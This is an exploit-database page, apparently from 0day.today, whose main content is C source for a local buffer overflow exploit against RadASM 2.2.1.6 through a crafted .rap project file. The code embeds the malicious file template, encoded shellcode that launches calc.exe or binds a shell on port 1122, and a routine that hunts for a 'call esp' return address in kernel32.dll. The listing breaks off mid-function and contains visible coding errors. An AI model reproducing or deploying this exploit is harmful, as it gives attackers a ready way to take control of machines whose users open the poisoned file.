0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Radasm .rap file local buffer overflow vulnerability
[====================================================
Radasm .rap file local buffer overflow vulnerability
====================================================
#include<stdio.h>
#include<windows.h>
#include<getopt.h>
void gen_random(char*,const int);
void print(char*);
unsigned int getFsize(FILE*,char*);
void buildfile(char*);
int make_bindshell(unsigned short);
void help();
void printshell();
DWORD SearchStream(const char *,size_t,const char *,size_t);
DWORD GetNtosDelta (VOID);
DWORD GetOSVersion (VOID);
DWORD FindRetToEspAddress(VOID);
#define VULNF "ufwew.rap"
#define VER "2.2.1.6"
#define POCNAME "Radasm .rap file local buffer overflow exploit"
#define AUTHOR "fl0 fl0w"
#define IF(x,NULL) if(x==NULL)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define EIPOFFSET 0xDD
#define NOP "\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90"
#define NUL '\0'
#define CLEAR(x) free(x)
#define WXP_DELTA 0xA67FF;
#define W2K_DELTA 0x0;
#define W2K3_DELTA 0x0;
#define WVISTA_DELTA 0x0;
char file[]={ //1534 bytes
0x5B, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x5D, 0x0D, 0x0D, 0x0A, 0x41, 0x73, 0x73, 0x65,
0x6D, 0x62, 0x6C, 0x65, 0x72, 0x3D, 0x6D, 0x61, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F,
0x75, 0x70, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x45, 0x78, 0x70, 0x61,
0x6E, 0x64, 0x3D, 0x31, 0x0D, 0x0D, 0x0A, 0x5B, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D,
0x0A, 0x31, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x72, 0x41, 0x51, 0x42,
0x63, 0x38, 0x57, 0x73, 0x61, 0x31, 0x78, 0x56, 0x50, 0x66, 0x76, 0x4A, 0x63, 0x72, 0x67, 0x52,
0x59, 0x77, 0x54, 0x69, 0x69, 0x7A, 0x73, 0x32, 0x74, 0x72, 0x51, 0x46, 0x36, 0x39, 0x41, 0x7A,
0x42, 0x6C, 0x61, 0x78, 0x33, 0x43, 0x46, 0x33, 0x45, 0x44, 0x4E, 0x68, 0x6D, 0x33, 0x73, 0x6F,
0x4C, 0x42, 0x50, 0x68, 0x37, 0x31, 0x59, 0x65, 0x78, 0x75, 0x69, 0x65, 0x61, 0x6F, 0x45, 0x69,
0x49, 0x67, 0x78, 0x49, 0x58, 0x34, 0x61, 0x32, 0x64, 0x52, 0x45, 0x62, 0x62, 0x53, 0x71, 0x57,
0x79, 0x36, 0x79, 0x68, 0x4B, 0x49, 0x44, 0x43, 0x64, 0x4A, 0x4F, 0x79, 0x61, 0x70, 0x6E, 0x78,
0x72, 0x70, 0x4D, 0x43, 0x41, 0x52, 0x43, 0x72, 0x34, 0x7A, 0x64, 0x47, 0x63, 0x38, 0x31, 0x74,
0x42, 0x44, 0x4B, 0x73, 0x4D, 0x6C, 0x61, 0x5A, 0x54, 0x58, 0x43, 0x31, 0x4F, 0x38, 0x59, 0x46,
0x4F, 0x47, 0x4B, 0x6A, 0x78, 0x52, 0x72, 0x4A, 0x42, 0x64, 0x54, 0x33, 0x68, 0x56, 0x4F, 0x66,
0x6F, 0x61, 0x4D, 0x65, 0x41, 0x6A, 0x53, 0x57, 0x66, 0x63, 0x68, 0x6F, 0x5A, 0x59, 0x46, 0x59,
0x5A, 0x35, 0x42, 0x36, 0x6B, 0x7A, 0x4D, 0x43, 0x6B, 0x38, 0x52, 0x36, 0x42, 0x45, 0x75, 0x5A,
0x4D, 0x72, 0x46, 0x36, 0x63, 0x49, 0x36, 0x4E, 0x58, 0x38, 0x44, 0x59, 0x64, 0x44, 0x33, 0x6F,
0x6A, 0x78, 0x53, 0x6E, 0x71, 0x50, 0x54, 0x47, 0x66, 0x52, 0x79, 0x69, 0x6C, 0x4F, 0x59, 0x47,
0x78, 0x6C, 0x53, 0x58, 0x50, 0x74, 0x4C, 0x4A, 0x62, 0x6F, 0x48, 0x38, 0x53, 0x34, 0x6B, 0x77,
0x49, 0x67, 0x54, 0x78, 0x42, 0x42, 0x42, 0x42, 0x41, 0x41, 0x41, 0x41, 0x7A, 0x4F, 0x4C, 0x4D,
0x72, 0x62, 0x41, 0x79, 0x66, 0x4B, 0x55, 0x55, 0x54, 0x73, 0x47, 0x43, 0x6F, 0x52, 0x62, 0x6C,
0x73, 0x61, 0x71, 0x76, 0x36, 0x55, 0x70, 0x64, 0x76, 0x4E, 0x49, 0x73, 0x4E, 0x72, 0x6D, 0x77,
0x55, 0x6C, 0x4E, 0x35, 0x75, 0x39, 0x74, 0x33, 0x74, 0x67, 0x6A, 0x32, 0x74, 0x75, 0x73, 0x5A,
0x42, 0x61, 0x75, 0x46, 0x6B, 0x72, 0x46, 0x43, 0x4A, 0x43, 0x6D, 0x5A, 0x46, 0x4F, 0x76, 0x31,
0x51, 0x44, 0x49, 0x49, 0x58, 0x4A, 0x4E, 0x5A, 0x49, 0x39, 0x35, 0x68, 0x46, 0x51, 0x72, 0x37,
0x37, 0x42, 0x49, 0x45, 0x6C, 0x79, 0x63, 0x74, 0x34, 0x41, 0x6A, 0x36, 0x50, 0x4B, 0x6E, 0x5A,
0x70, 0x7A, 0x52, 0x69, 0x4B, 0x59, 0x70, 0x5A, 0x67, 0x6E, 0x53, 0x4F, 0x4B, 0x6C, 0x71, 0x38,
0x41, 0x7A, 0x72, 0x48, 0x71, 0x44, 0x6F, 0x47, 0x4C, 0x34, 0x52, 0x48, 0x79, 0x71, 0x79, 0x58,
0x33, 0x67, 0x35, 0x41, 0x79, 0x79, 0x36, 0x31, 0x6C, 0x65, 0x44, 0x59, 0x54, 0x33, 0x43, 0x45,
0x57, 0x38, 0x4B, 0x36, 0x39, 0x72, 0x6B, 0x6C, 0x50, 0x47, 0x74, 0x66, 0x55, 0x52, 0x32, 0x49,
0x5A, 0x32, 0x6D, 0x42, 0x31, 0x53, 0x37, 0x4E, 0x4C, 0x74, 0x32, 0x6E, 0x51, 0x66, 0x6A, 0x33,
0x53, 0x4C, 0x33, 0x58, 0x42, 0x79, 0x49, 0x6D, 0x63, 0x69, 0x51, 0x54, 0x71, 0x56, 0x61, 0x41,
0x55, 0x6E, 0x4A, 0x76, 0x55, 0x6D, 0x48, 0x56, 0x51, 0x47, 0x73, 0x54, 0x6D, 0x76, 0x48, 0x65,
0x75, 0x53, 0x45, 0x42, 0x4D, 0x53, 0x50, 0x68, 0x32, 0x51, 0x36, 0x64, 0x51, 0x41, 0x6A, 0x79,
0x34, 0x4B, 0x6A, 0x73, 0x66, 0x53, 0x58, 0x46, 0x34, 0x59, 0x50, 0x38, 0x61, 0x72, 0x46, 0x33,
0x53, 0x4C, 0x4C, 0x6E, 0x79, 0x33, 0x30, 0x4B, 0x4B, 0x7A, 0x69, 0x48, 0x74, 0x52, 0x62, 0x4F,
0x45, 0x32, 0x75, 0x38, 0x71, 0x76, 0x4A, 0x50, 0x33, 0x42, 0x36, 0x55, 0x69, 0x75, 0x31, 0x67,
0x4A, 0x30, 0x33, 0x4F, 0x68, 0x6D, 0x57, 0x76, 0x6E, 0x37, 0x4D, 0x49, 0x72, 0x39, 0x6F, 0x44,
0x55, 0x54, 0x4F, 0x58, 0x37, 0x4E, 0x59, 0x45, 0x6B, 0x5A, 0x67, 0x7A, 0x55, 0x6E, 0x79, 0x31,
0x73, 0x77, 0x4F, 0x62, 0x64, 0x59, 0x53, 0x45, 0x76, 0x57, 0x52, 0x42, 0x4C, 0x7A, 0x5A, 0x30,
0x32, 0x68, 0x36, 0x37, 0x59, 0x72, 0x6C, 0x76, 0x42, 0x6E, 0x64, 0x6E, 0x34, 0x63, 0x58, 0x50,
0x61, 0x6F, 0x61, 0x4B, 0x6B, 0x35, 0x6C, 0x51, 0x6E, 0x33, 0x33, 0x68, 0x66, 0x4E, 0x57, 0x50,
0x67, 0x72, 0x38, 0x38, 0x31, 0x6E, 0x50, 0x37, 0x56, 0x78, 0x45, 0x45, 0x34, 0x46, 0x64, 0x67,
0x63, 0x4C, 0x39, 0x66, 0x4F, 0x50, 0x79, 0x63, 0x39, 0x38, 0x62, 0x49, 0x38, 0x39, 0x71, 0x54,
0x50, 0x46, 0x74, 0x79, 0x73, 0x4C, 0x31, 0x51, 0x34, 0x47, 0x54, 0x4F, 0x50, 0x77, 0x44, 0x37,
0x6B, 0x6B, 0x71, 0x50, 0x71, 0x51, 0x35, 0x50, 0x4E, 0x45, 0x45, 0x66, 0x75, 0x54, 0x6C, 0x43,
0x48, 0x39, 0x57, 0x70, 0x49, 0x59, 0x61, 0x50, 0x48, 0x57, 0x66, 0x55, 0x54, 0x6A, 0x6C, 0x54,
0x4F, 0x53, 0x6A, 0x33, 0x69, 0x48, 0x37, 0x4A, 0x54, 0x52, 0x73, 0x62, 0x59, 0x48, 0x31, 0x33,
0x33, 0x54, 0x79, 0x57, 0x4C, 0x49, 0x42, 0x34, 0x47, 0x33, 0x73, 0x56, 0x30, 0x79, 0x6B, 0x50,
0x64, 0x73, 0x37, 0x48, 0x58, 0x32, 0x37, 0x4B, 0x62, 0x4E, 0x43, 0x43, 0x79, 0x74, 0x4A, 0x52,
0x38, 0x43, 0x75, 0x36, 0x58, 0x46, 0x70, 0x74, 0x45, 0x49, 0x50, 0x36, 0x38, 0x76, 0x38, 0x5A,
0x64, 0x56, 0x36, 0x30, 0x47, 0x58, 0x41, 0x50, 0x5A, 0x48, 0x41, 0x44, 0x32, 0x76, 0x51, 0x6B,
0x57, 0x72, 0x70, 0x71, 0x69, 0x77, 0x64, 0x6F, 0x33, 0x48, 0x72, 0x64, 0x74, 0x36, 0x7A, 0x33,
0x6C, 0x53, 0x54, 0x70, 0x67, 0x54, 0x70, 0x52, 0x70, 0x52, 0x56, 0x63, 0x77, 0x6F, 0x36, 0x48,
0x4D, 0x38, 0x75, 0x41, 0x38, 0x44, 0x39, 0x65, 0x45, 0x34, 0x5A, 0x41, 0x44, 0x74, 0x6D, 0x76,
0x57, 0x76, 0x4E, 0x32, 0x30, 0x4C, 0x42, 0x48, 0x53, 0x6B, 0x44, 0x36, 0x71, 0x72, 0x37, 0x4A,
0x31, 0x68, 0x41, 0x6B, 0x54, 0x6B, 0x55, 0x46, 0x76, 0x4D, 0x41, 0x30, 0x4F, 0x53, 0x61, 0x39,
0x31, 0x65, 0x39, 0x67, 0x71, 0x56, 0x4E, 0x42, 0x65, 0x67, 0x31, 0x30, 0x67, 0x41, 0x49, 0x34,
0x4F, 0x4D, 0x72, 0x78, 0x46, 0x32, 0x6C, 0x74, 0x52, 0x50, 0x57, 0x61, 0x63, 0x4B, 0x77, 0x68,
0x7A, 0x51, 0x79, 0x77, 0x38, 0x62, 0x79, 0x78, 0x49, 0x46, 0x77, 0x4F, 0x51, 0x66, 0x78, 0x46,
0x59, 0x79, 0x30, 0x71, 0x75, 0x75, 0x62, 0x70, 0x43, 0x7A, 0x49, 0x37, 0x31, 0x4D, 0x52, 0x56,
0x4F, 0x67, 0x44, 0x6B, 0x6F, 0x38, 0x66, 0x6E, 0x50, 0x59, 0x6C, 0x61, 0x70, 0x64, 0x76, 0x78,
0x6C, 0x55, 0x73, 0x42, 0x48, 0x32, 0x39, 0x43, 0x6D, 0x33, 0x4F, 0x52, 0x59, 0x6B, 0x66, 0x72,
0x6A, 0x52, 0x5A, 0x44, 0x64, 0x77, 0x36, 0x4C, 0x63, 0x70, 0x58, 0x33, 0x33, 0x65, 0x31, 0x49,
0x4F, 0x77, 0x57, 0x52, 0x32, 0x75, 0x61, 0x41, 0x74, 0x5A, 0x56, 0x42, 0x35, 0x79, 0x69, 0x39,
0x69, 0x6A, 0x53, 0x41, 0x6A, 0x42, 0x51, 0x6A, 0x67, 0x6E, 0x5A, 0x53, 0x43, 0x65, 0x38, 0x6E,
0x50, 0x51, 0x48, 0x6E, 0x70, 0x70, 0x5A, 0x71, 0x74, 0x34, 0x35, 0x36, 0x75, 0x4E, 0x68, 0x61,
0x41, 0x41, 0x5A, 0x2E, 0x41, 0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x41, 0x56, 0x50, 0x20,
0x4F, 0x76, 0x65, 0x72, 0x2E, 0x49, 0x6E, 0x63, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65,
0x46, 0x69, 0x6C, 0x65, 0x73, 0x5D, 0x0D, 0x0D, 0x0A, 0x30, 0x3D, 0x41, 0x56, 0x50, 0x20, 0x4F,
0x76, 0x65, 0x72, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x5B, 0x4D, 0x61, 0x6B, 0x65, 0x44,
0x65, 0x66, 0x5D, 0x0D, 0x0D, 0x0A, 0x4D, 0x65, 0x6E, 0x75, 0x3D, 0x30, 0x2C, 0x31, 0x2C, 0x31,
0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30,
0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x0D, 0x0D, 0x0A, 0x31, 0x3D, 0x34,
0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x52, 0x43, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x76, 0x2C,
0x31, 0x0D, 0x0D, 0x0A, 0x32, 0x3D, 0x33, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E,
0x45, 0x58, 0x45, 0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70,
0x20, 0x2F, 0x6E, 0x6F, 0x36, 0x43, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22,
0x2C, 0x32, 0x0D, 0x0D, 0x0A, 0x33, 0x3D, 0x35, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4C, 0x49,
0x4E, 0x4B, 0x2E, 0x45, 0x58, 0x45, 0x20, 0x2F, 0x53, 0x55, 0x42, 0x53, 0x59, 0x53, 0x54, 0x45,
0x4D, 0x3A, 0x57, 0x49, 0x4E, 0x44, 0x4F, 0x57, 0x53, 0x20, 0x2F, 0x52, 0x45, 0x4C, 0x45, 0x41,
0x53, 0x45, 0x20, 0x2F, 0x56, 0x45, 0x52, 0x53, 0x49, 0x4F, 0x4E, 0x3A, 0x34, 0x2E, 0x30, 0x20,
0x2F, 0x4C, 0x49, 0x42, 0x50, 0x41, 0x54, 0x48, 0x3A, 0x22, 0x24, 0x4C, 0x22, 0x20, 0x2F, 0x4F,
0x55, 0x54, 0x3A, 0x22, 0x24, 0x35, 0x22, 0x2C, 0x33, 0x0D, 0x0D, 0x0A, 0x34, 0x3D, 0x30, 0x2C,
0x30, 0x2C, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x35, 0x3D, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x6F, 0x62,
0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x43, 0x56, 0x54, 0x52, 0x45, 0x53, 0x2E, 0x45, 0x58,
0x45, 0x2C, 0x72, 0x73, 0x72, 0x63, 0x2E, 0x72, 0x65, 0x73, 0x0D, 0x0D, 0x0A, 0x36, 0x3D, 0x2A,
0x2E, 0x6F, 0x62, 0x6A, 0x2C, 0x4F, 0x2C, 0x24, 0x42, 0x5C, 0x4D, 0x4C, 0x2E, 0x45, 0x58, 0x45,
0x20, 0x2F, 0x63, 0x20, 0x2F, 0x63, 0x6F, 0x66, 0x66, 0x20, 0x2F, 0x43, 0x70, 0x20, 0x2F, 0x6E,
0x6F, 0x6C, 0x6F, 0x67, 0x6F, 0x20, 0x2F, 0x49, 0x22, 0x24, 0x49, 0x22, 0x2C, 0x2A, 0x2E, 0x61,
0x73, 0x6D, 0x0D, 0x0D, 0x0A, 0x37, 0x3D, 0x30, 0x2C, 0x30, 0x2C, 0x22, 0x24, 0x45, 0x5C, 0x4F,
0x6C, 0x6C, 0x79, 0x44, 0x62, 0x67, 0x22, 0x2C, 0x35, 0x0D, 0x0D, 0x0A, 0x5B, 0x47, 0x72, 0x6F,
0x75, 0x70, 0x5D, 0x0D, 0x0D, 0x0A, 0x47, 0x72, 0x6F, 0x75, 0x70, 0x3D, 0x41, 0x64, 0x64, 0x65,
0x64, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x73, 0x2C, 0x41, 0x73, 0x73, 0x65, 0x6D, 0x62, 0x6C, 0x79,
0x2C, 0x52, 0x65, 0x73, 0x6F, 0x75, 0x72, 0x63, 0x65, 0x73, 0x2C, 0x4D, 0x69, 0x73, 0x63, 0x2C,
0x4D, 0x6F, 0x64, 0x75, 0x6C, 0x65, 0x73, 0x0D, 0x0A, 0x31, 0x3D, 0x31, 0x0D, 0x0A,};
DWORD g_dwOsVersion = 0;
LPVOID g_PatchAddress = NULL;
typedef BOOL(WINAPI *PENUMDEVICES)(LPVOID*,DWORD ,LPDWORD);
typedef DWORD(WINAPI *PGETDEVNAME)(LPVOID ImageBase,char *lpBaseName,DWORD nSize);
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
enum OSes
{
OS_WXP=1,
OS_W2K,
OS_W2K3,
OS_VISTA
};
typedef enum{
True=1,
False=0,
Error=-1
}boolean;
struct{
char* sname;
int sz;
char* shell;
}use[]={
{"calc.exe",338,
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63"
"\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38"
"\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e"
"\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62"
"\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74"
"\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c"
"\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39"
"\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b"
"\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64"
"\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37"
"\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b"
"\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b"
"\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47"
"\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f"
"\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61"
"\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f"
"\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55"
"\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42"
"\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57\x70\x63"},
{
"Bind port 1122",709,
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
"\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
"\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
"\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
"\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"
},
{NUL,NUL}
};
struct{
unsigned int code;
}usez;
DWORD ret;
int S;
int main(int argc,char* argv[]){
ret=FindRetToEspAddress();//default eip
if(argc<2){
system("cls");
help();
GetNtosDelta();
printshell();
printf("[^]The default retcode is :0x%X",ret);
exit(0);}
printf("[!]%s\n[!]%s\n[!]By %s\n",POCNAME,VER,AUTHOR);
int opt;
while((opt=getopt(argc,argv,"s:t"))!=-1){
switch(opt){
case 's':
S=atoi(optarg);
break;
case 't':
sscanf(argv[4],"%x",&ret);
break;
default:
help();
}}
buildfile(VULNF);
printf("[#]You selected: %s\n",use[S].sname);
print("DONE!");
getchar();
return 0;
}
void buildfile(char* fname){
char buffer[100000];
gen_random(buffer,5000);
memcpy(buffer,file,strlen(file));
memcpy(buffer+292,&ret,4);
memcpy(buffer+312,NOP,10);
memcpy(buffer+322,use[S].shell,strlen(use[S].shell));
printf("[#]Your Retcode is: 0x%X\n",ret);
FILE* f=fopen(fname,"wb");
if(f){
fwrite(buffer,1,1534,f);
fclose(f);
}
else {
print("Error in writing file");
exit(0);
}
free(buffer);
free(file);
int sz=getFsize(f,fname);
printf("[!]File is %d bytes\n",sz);
}
void help()
{ char h[]="************************************************\n"
"*Radasm .rap file local buffer overflow exploit*\n"
"*syntax: [-h<shellcode>] [-t<your target>] *\n"
"* -s shellcode to run 0 or 1 *\n"
"* -t your target *\n"
"* example: radasm.exe -s 0 -t 0xFFFFFFFF *\n"
"* If you want a retcode default from your *\n"
"* memory don't use -t option *\n"
"************************************************\n";
printf("%s",h);}
void printshell()
{ print("We can use:");
int i;
FOR(i,0,2){
printf("[!] %d. %s of size: %d bytes\n",i,use[i].sname,strlen(use[i].shell)); }
}
DWORD GetOSVersion (VOID)
{
OSVERSIONINFOA osvi;
DWORD retval = 0;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
if(GetVersionExA(&osvi))
{ if(osvi.dwMajorVersion==5)
{
switch(osvi.dwMinorVersion)
{
case 0:
retval=OS_W2K;
break;
case 1:
retval=OS_WXP;
break;
case 2:
retval=OS_W2K3;
break;
}
}
else if(osvi.dwMajorVersion==6)
{retval=OS_VISTA;
}
}
g_dwOsVersion=retval;
return retval;
}
DWORD GetNtosDelta (VOID)
{ DWORD retval = 0;
switch(GetOSVersion())
{
case OS_VISTA:
print("System identified as Windows Vista\n");
retval=WVISTA_DELTA;
break;
case OS_W2K:
print("System identified as Windows 2000\n");
retval=W2K_DELTA;
break;
case OS_W2K3:
print("System identified as Windows 2003\n");
retval=W2K3_DELTA;
break;
case OS_WXP:
print("System identified as Windows XP\n");
retval=WXP_DELTA;
break;
default:
print("Unidentified system!\n");
}
return retval;
}
DWORD SearchStream(
const char *pvStream,
size_t uStreamSize,
const char *pvSubStream,
size_t uSubStreamSize)
{unsigned int uCount = 0,i,j;
while( (uStreamSize) > (uCount) ) {
for(i=0;i<=(uSubStreamSize-1);i++) {
if(*pvStream != pvSubStream[i]) {
*pvStream++;
if( i>0 ) {
for(j=0;j<i;j++)
*pvStream--;
}
break;
}
if(i==(uSubStreamSize-1))
return(uCount);
*pvStream++;
}
uCount++;
}
return -1;
}
DWORD FindRetToEspAddress(VOID)
{HMODULE hModule = GetModuleHandle("kernel32.dll");
DWORD dwEspRet;
char* pszCallEsp = "\xFF\xD4";
PIMAGE_DOS_HEADER pimage_dos_header;
PIMAGE_NT_HEADERS pimage_nt_headers;
pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);
dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));
return (dwEspRet += (DWORD)hModule);
}
unsigned int getFsize(FILE* g,char* gname)
{unsigned int s;
